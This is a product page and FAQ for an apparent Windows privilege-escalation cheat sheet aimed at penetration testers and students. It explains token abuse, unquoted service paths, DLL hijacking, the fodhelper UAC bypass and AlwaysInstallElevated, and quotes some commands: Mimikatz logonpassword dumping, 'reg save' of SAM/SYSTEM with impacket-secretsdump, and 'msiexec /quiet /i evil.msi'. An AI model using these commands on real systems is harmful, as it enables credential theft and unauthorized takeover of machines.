liminfo

Windows Privilege Escalation

Free reference guide: Windows Privilege Escalation

26 results

About Windows Privilege Escalation

The Windows Privilege Escalation Reference is a categorized cheat sheet of post-exploitation techniques for escalating privileges from a low-privileged user to SYSTEM or Administrator on Windows systems. It covers six attack categories: token manipulation (SeImpersonatePrivilege abuse with JuicyPotato, PrintSpoofer, GodPotato), Windows service misconfigurations (unquoted paths, weak permissions, binary replacement), registry-based attacks (AlwaysInstallElevated, autorun, stored credentials, service registry keys), DLL hijacking (search order abuse, phantom DLL, DLL proxying), UAC bypass methods (fodhelper.exe, eventvwr.exe, sdclt.exe), and credential harvesting (cmdkey, Mimikatz, SAM/SYSTEM dump, WiFi passwords).

Each entry provides the exact command-line syntax or PowerShell one-liner needed to check for the vulnerability and exploit it, along with tool names (JuicyPotato, PrintSpoofer, GodPotato, Mimikatz, accesschk, procmon, impacket-secretsdump) and specific flags. The reference is designed for penetration testers, red team operators, CTF participants, and security students preparing for OSCP/CRTO/eCPPT certifications who need a fast lookup during engagements.

The content is organized as a searchable RefTool with bash syntax highlighting and bilingual Korean/English support. All information is presented in the browser with no server-side processing. This is an educational reference for authorized security testing only.

Key Features

  • Token exploitation techniques: JuicyPotato, PrintSpoofer, GodPotato, and token duplication for SYSTEM access
  • Service misconfiguration attacks: unquoted service path, weak service permissions (accesschk), binary replacement
  • Registry-based escalation: AlwaysInstallElevated MSI abuse, autorun hijacking, stored credential search
  • DLL hijacking methods: DLL search order abuse, phantom DLL loading, DLL proxying with function forwarding
  • UAC bypass via auto-elevating binaries: fodhelper.exe, eventvwr.exe, sdclt.exe registry key manipulation
  • Credential harvesting: cmdkey /list, Mimikatz sekurlsa::logonpasswords, SAM/SYSTEM dump with impacket
  • WiFi password extraction and file-based credential search across user directories
  • Searchable, filterable interface with bash/PowerShell syntax highlighting and bilingual Korean/English content

Frequently Asked Questions

What is SeImpersonatePrivilege and why is it important?

SeImpersonatePrivilege is a Windows privilege that allows a process to impersonate the security context of another user. When enabled for a service account (common for IIS, MSSQL, and other service accounts), an attacker can use Potato-family exploits (JuicyPotato, PrintSpoofer, GodPotato) to impersonate SYSTEM tokens and gain full administrative control. Check with whoami /priv.

How does an unquoted service path attack work?

When a Windows service executable path contains spaces and is not enclosed in quotation marks (e.g., C:\Program Files\My App\service.exe), Windows tries to resolve the path by testing C:\Program.exe, then C:\Program Files\My.exe, etc. An attacker can place a malicious executable at one of these intermediate paths to execute code when the service starts or restarts.

What is DLL hijacking and how is it detected?

DLL hijacking exploits the Windows DLL search order. When an application loads a DLL, Windows searches directories in a specific order (application directory, System32, etc.). Using Process Monitor (procmon) to filter for "NAME NOT FOUND" results for .dll files reveals DLLs that an application expects but cannot find. Placing a malicious DLL with that name in a writable search path directory causes the application to load it.

How does the fodhelper.exe UAC bypass work?

fodhelper.exe is a Windows binary that auto-elevates without a UAC prompt. It reads its command handler from the HKCU registry key Software\Classes\ms-settings\Shell\Open\command. By setting this registry value to point to cmd.exe (or any payload) and adding a DelegateExecute value, running fodhelper.exe executes the payload with elevated privileges, bypassing the UAC consent dialog.

What is AlwaysInstallElevated and how is it exploited?

AlwaysInstallElevated is a Windows Group Policy setting that, when enabled in both HKLM and HKCU, allows any user to install MSI packages with SYSTEM privileges. An attacker generates a malicious MSI payload (e.g., via msfvenom -f msi) and installs it silently with msiexec /quiet /i evil.msi, gaining SYSTEM-level code execution.

How do I extract credentials using Mimikatz?

Run Mimikatz with privilege::debug to enable the debug privilege, then use sekurlsa::logonpasswords to extract plaintext passwords and NTLM hashes from LSASS memory. Additional modules include lsadump::sam for SAM database extraction and vault::cred for Windows Credential Vault entries. Mimikatz requires local Administrator privileges or SeDebugPrivilege.

How do I dump and crack the SAM database?

Use reg save HKLM\SAM C:\temp\SAM and reg save HKLM\SYSTEM C:\temp\SYSTEM to export the registry hives (requires Administrator). Then on an attack machine, use impacket-secretsdump -sam SAM -system SYSTEM LOCAL to extract NTLM hashes. The SYSTEM hive provides the bootkey needed to decrypt the SAM database.

Is this reference intended for authorized testing only?

Yes. All techniques documented in this reference are intended exclusively for authorized penetration testing, red team engagements, CTF competitions, and security education. Unauthorized use of these techniques against systems you do not own or have written permission to test is illegal and unethical. Always obtain proper authorization before performing any security testing.